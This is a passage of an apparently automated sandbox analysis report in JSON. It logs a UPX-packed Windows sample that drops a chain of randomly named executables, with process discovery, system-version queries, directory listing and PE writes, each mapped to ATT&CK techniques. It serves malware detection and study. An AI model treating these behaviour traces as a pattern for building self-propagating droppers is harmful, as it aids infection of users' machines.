to determine if process is running under WOW64", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"IsWow64Process\" with parameter \"5968\" - (UID: 00000000-00005968)\n \"24680.exe\" called \"IsWow64Process\" with parameter \"3744\" - (UID: 00000000-00003744)\n \"00062.exe\" called \"IsWow64Process\" with parameter \"5896\" - (UID: 00000000-00005896)\n \"njhfl.exe\" called \"IsWow64Process\" with parameter \"4296\" - (UID: 00000000-00004296)\n \"60064.exe\" called \"IsWow64Process\" with parameter \"4340\" - (UID: 00000000-00004340)\n \"2288488.exe\" called \"IsWow64Process\" with parameter \"6120\" - (UID: 00000000-00006120)\n \"48866.exe\" called \"IsWow64Process\" with parameter \"4236\" - (UID: 00000000-00004236)\n \"xbxthhr.exe\" called \"IsWow64Process\" with parameter \"5860\" - (UID: 00000000-00005860)\n \"fhhxhtt.exe\" called \"IsWow64Process\" with parameter \"4460\" - (UID: 00000000-00004460)\n \"08446.exe\" called \"IsWow64Process\" with parameter \"4488\" - (UID: 00000000-00004488)\n \"8240402.exe\" called \"IsWow64Process\" with parameter \"3564\" - (UID: 00000000-00003564)\n \"802848.exe\" called \"IsWow64Process\" with parameter \"3980\" - (UID: 00000000-00003980)\n \"4404864.exe\" called \"IsWow64Process\" with parameter \"3628\" - (UID: 00000000-00003628)\n \"dbhbvhd.exe\" called \"IsWow64Process\" with parameter \"4092\" - (UID: 00000000-00004092)\n \"xfllptv.exe\" called \"IsWow64Process\" with parameter \"3276\" - (UID: 00000000-00003276)\n \"pppjrfj.exe\" called \"IsWow64Process\" with parameter \"2472\" - (UID: 00000000-00002472)\n \"tjtvdt.exe\" called \"IsWow64Process\" with parameter \"2700\" - (UID: 00000000-00002700)\n \"dtdld.exe\" called \"IsWow64Process\" with parameter \"4568\" - (UID: 00000000-00004568)\n \"tjjhnh.exe\" called \"IsWow64Process\" with parameter \"4492\" - (UID: 00000000-00004492)\n \"brpvfll.exe\" called \"IsWow64Process\" with parameter \"2416\" - (UID: 00000000-00002416)\n \"240248.exe\" called \"IsWow64Process\" with parameter \"3864\" - (UID: 00000000-00003864)\n \"20468.exe\" called \"IsWow64Process\" with parameter \"3656\" - (UID: 00000000-00003656)\n \"jjjhv.exe\" called \"IsWow64Process\" with parameter \"4048\" - (UID: 00000000-00004048)\n \"jfnlx.exe\" called \"IsWow64Process\" with parameter \"1844\" - (UID: 00000000-00001844)\n \"rdrhhx.exe\" called \"IsWow64Process\" with parameter \"4364\" - (UID: 00000000-00004364)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003700d8203700d3203700000000000000000000002f00000000011ce312000000000080f0120095e13b7737097700feffffff435c3f7750593f77aa000000b8000000d2203700d0203700a4e41200dce812000000000000000000000000000000000000000000000000008025000000002f001c5c3e7760d85875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3f77fa203700a06a157586000000a4e41200dce812000000000086008800a06a1575a4e41200916c1575fa203700a06a1575a06a157514e9120002020000 (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005968)\n \"24680.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003744)\n \"24680.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a0038346a0033346a00000000000000000000006200000000011ce312000000000080f0120095e13b77910d7700feffffff435c3f7750593f77aa000000b800000032346a0030346a00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000062001c5c3e7760d85875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3f775a346a00a06a157586000000a4e41200dce812000000000086008800a06a1575a4e41200916c15755a346a00a06a1575a06a157514e9120002020000 (UID: 00000000-00003744)\n \"24680.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003744)\n \"2428202.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003200403632003b363200000000000000000000002a00000000011ce312000000000080f0120095e13b7771337700feffffff435c3f7750593f77aa000000b80000003a36320038363200a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c3e7760d85875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3f7762363200a06a157586000000a4e41200dce812000000000086008800a06a1575a4e41200916c157562363200a06a1575a06a157514e9120002020000 (UID: 00000000-00005964)\n \"2428202.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005964)\n \"00062.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005896)\n \"00062.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003700b0353700ab353700000000000000000000002f00000000011ce312000000000080f0120095e13b770a327700feffffff435c3f7750593f77aa000000b8000000aa353700a8353700a4e41200dce81200000000000000000000000000000000000000000000000000e019000000002f001c5c3e7760d85875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3f77d2353700a06a157586000000a4e41200dce812000000000086008800a06a1575a4e41200916c1575d2353700a06a1575a06a157514e9120002020000 (UID: 00000000-00005896)\n \"00062.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005896)\n \"njhfl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004296)\n \"njhfl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a00b8336a00b3336a00000000000000000000006200000000011ce312000000000080f0120095e13b7728357700feffffff435c3f7750593f77aa000000b8000000b2336a00b0336a00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000062001c5c3e7760d85875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3f77da336a00a06a157586000000a4e41200dce812000000000086008800a06a1575a4e41200916c1575da336a00a06a1575a06a157514e9120002020000 (UID: 00000000-00004296)\n \"njhfl.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004296)\n \"66840.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b00f8342b00f3342b00000000000000000000002300000000011ce312000000000080f0120095e13b77f93a7700feffffff435c3f7750593f77aa000000b8000000f2342b00f0342b00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c3e7760d85875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3f771a352b00a06a157586000000a4e41200dce812000000000086008800a06a1575a4e41200916c15751a352b00a06a1575a06a157514e9120002020000 (UID: 00000000-00004244)\n \"66840.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004244)\n \"60064.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004340)\n \"60064.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b0078b42b0073b42b00000000000000000000002400000000011ce312000000000080f0120095e13b77f3397700feffffff435c3f7750593f77aa000000b800000072b42b0070b42b00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c3e7760d85875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3f779ab42b00a06a157586000000a4e41200dce812000000000086008800a06a1575a4e41200916c15759ab42b00a06a1575a06a157514e9120002020000 (UID: 00000000-00004340)\n \"60064.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004340)\n \"2288488.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006120)\n \"2288488.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006700a03467009b346700000000000000000000005f00000000011ce312000000000080f0120095e13b77a43f7700feffffff435c3f7750593f77aa000000b80000009a34670098346700a4e41200dce81200000000000000000000000000000000000000000000000000e019000000005f001c5c3e7760d85875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3f77c2346700a06a157586000000a4e41200dce812000000000086008800a06a1575a4e41200916c1575c2346700a06a1575a06a157514e9120002020000 (UID: 00000000-00006120)\n \"2288488.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006120)\n \"48866.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004236)\n \"48866.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000220078b4220073b42200000000000000000000001b00000000011ce312000000000080f0120095e13b77ee217700feffffff435c3f7750593f77aa000000b800000072b4220070b42200a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001b001c5c3e7760d85875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed3f779ab42200a06a157586000000a4e41200dce812000000000086008800a06a1575a4e41200916c15759ab42200a06a1575a06a157514e9120002020000 (UID: 00000000-00004236)\n \"48866.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004236)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter 24680.exe (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005968)\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005968)\n \"24680.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00003744)\n \"24680.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00003744)\n \"24680.exe\" called \"FindNextFileW\" with parameter 2428202.exe (UID: 00000000-00003744)\n \"24680.exe\" called \"FindNextFileW\" with parameter 24680.exe (UID: 00000000-00003744)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"24680.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"00062.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"njhfl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"60064.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"2288488.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"48866.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xbxthhr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fhhxhtt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"08446.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8240402.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"802848.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4404864.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dbhbvhd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xfllptv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pppjrfj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tjtvdt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dtdld.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tjjhnh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"brpvfll.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"240248.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"20468.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jjjhv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jfnlx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rdrhhx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has an entrypoint in section \"UPX1\"\n \"pltvbn.exe\" has an entrypoint in section \"UPX1\"\n \"npdthpv.exe\" has an entrypoint in section \"UPX1\"\n \"dhtjtp.exe\" has an entrypoint in section \"UPX1\"\n \"nfrbnh.exe\" has an entrypoint in section \"UPX1\"\n \"00068.exe\" has an entrypoint in section \"UPX1\"\n \"840262.exe\" has an entrypoint in section \"UPX1\"\n \"4880662.exe\" has an entrypoint in section \"UPX1\"\n \"28028.exe\" has an entrypoint in section \"UPX1\"\n \"040202.exe\" has an entrypoint in section \"UPX1\"\n \"rtbxtx.exe\" has an entrypoint in section \"UPX1\"\n \"0228228.exe\" has an entrypoint in section \"UPX1\"\n \"080844.exe\" has an entrypoint in section \"UPX1\"\n \"046220.exe\" has an entrypoint in section \"UPX1\"\n \"86682.exe\" has an entrypoint in section \"UPX1\"\n \"4042804.exe\" has an entrypoint in section \"UPX1\"\n \"048424.exe\" has an entrypoint in section \"UPX1\"\n \"802262.exe\" has an entrypoint in section \"UPX1\"\n \"848084.exe\" has an entrypoint in section \"UPX1\"\n \"0406488.exe\" has an entrypoint in section \"UPX1\"\n \"vlhdl.exe\" has an entrypoint in section \"UPX1\"\n \"rpnxll.exe\" has an entrypoint in section \"UPX1\"\n \"rrhrlx.exe\" has an entrypoint in section \"UPX1\"\n \"dpdrtr.exe\" has an entrypoint in section \"UPX1\"\n \"224404.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" wrote 14812 bytes starting with PE header signature to file \"C:\\24680.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"24680.exe\" wrote 14825 bytes starting with PE header signature to file \"C:\\2428202.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2428202.exe\" wrote 14839 bytes starting with PE header signature to file \"C:\\00062.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"00062.exe\" wrote 14856 bytes starting with PE header signature to file \"C:\\njhfl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"njhfl.exe\" wrote 14868 bytes starting with PE header signature to file \"C:\\66840.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"66840.exe\" wrote 14881 bytes starting with PE header signature to file \"C:\\60064.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"60064.exe\" wrote 14894 bytes starting with PE header signature to file \"C:\\2288488.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2288488.exe\" wrote 14914 bytes starting with PE header signature to file \"C:\\48866.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"48866.exe\" wrote 14929 bytes starting with PE header signature to file \"C:\\xbxthhr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xbxthhr.exe\" wrote 14949 bytes starting with PE header signature to file \"C:\\fhhxhtt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fhhxhtt.exe\" wrote 14965 bytes starting with PE header signature to file \"C:\\648042.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"648042.exe\" wrote 14981 bytes starting with PE header signature to file \"C:\\80004.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"80004.exe\" wrote 14997 bytes starting with PE header signature to file \"C:\\08446.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"08446.exe\" wrote 15016 bytes starting with PE header signature to file \"C:\\28848.exe\": 